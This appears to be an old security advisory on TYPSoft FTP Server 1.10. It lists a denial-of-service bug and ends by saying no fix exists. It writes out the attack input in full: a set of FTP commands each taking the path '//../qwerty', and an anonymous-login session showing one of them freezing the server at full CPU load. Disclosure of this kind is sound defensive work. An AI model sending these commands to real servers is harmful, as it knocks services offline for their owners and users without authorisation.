Application: TYPSoft FTP Server http://www.typsoft.com/ Version: 1.10 Bug: [+] multiple vulnerabilities (Denial Of Service) [+] 100% employment of computer resources Author: intuit e-mail: intuit(at)linuxmail.org web: http://rootshells.tk/ greetz to: tgs ;) *********************************************************************** 1. Description 2. The bug 3. The code 4. The fix *********************************************************************** ^^^^^^^^^^^^^^^^ 1. Description: ^^^^^^^^^^^^^^^^ Vendor's Description: "TYPSoft FTP Server is a fast and easy ftp server with support to Standard FTP Command, Clean interface, Virtual File System architecture, ability to resume Download and Upload, IP Restriction, Login/Quit message, logs, Multi Language and many other things." *********************************************************************** ^^^^^^^^^^^^^^^^ 2. The bug: ^^^^^^^^^^^^^^^^ TYPSoft FTP Server may be DoS'ed with standart ftp commands: mkd, xmkd, dele, size, retr, stor, appe, rnfr, rnto, rmd, xrmd. With parameter "//../qwerty", like that: mkd //../qwerty xmkd //../qwerty dele //../qwerty size //../qwerty retr //../qwerty stor //../qwerty appe //../qwerty rnfr //../qwerty rnto //../qwerty rmd //../qwerty xrmd //../qwerty *********************************************************************** ^^^^^^^^^^^^^^^^ 3. The code: ^^^^^^^^^^^^^^^^ To test the vulnerability: ----------------------------------------------------------------------- 220 TYPSoft FTP Server 1.10 ready... user anonymous 331 Password required for anonymous. pass 230 User anonymous logged in. mkd //../qwerty ----------------------------------------------------------------------- and the ftp server will be DoS'ed + 100% employment of computer resources. /*Tested on: Win XP Build 2600, Service Pack: None Win XP Build 2600, Service Pack: SP1*/ *********************************************************************** ^^^^^^^^^^^^^^^^ 4. The fix: ^^^^^^^^^^^^^^^^ Not exist. *********************************************************************** -- ______________________________________________ Check out the latest SMS services @ http://www.linuxmail.org This allows you to send and receive SMS through your mailbox. Powered by Outblaze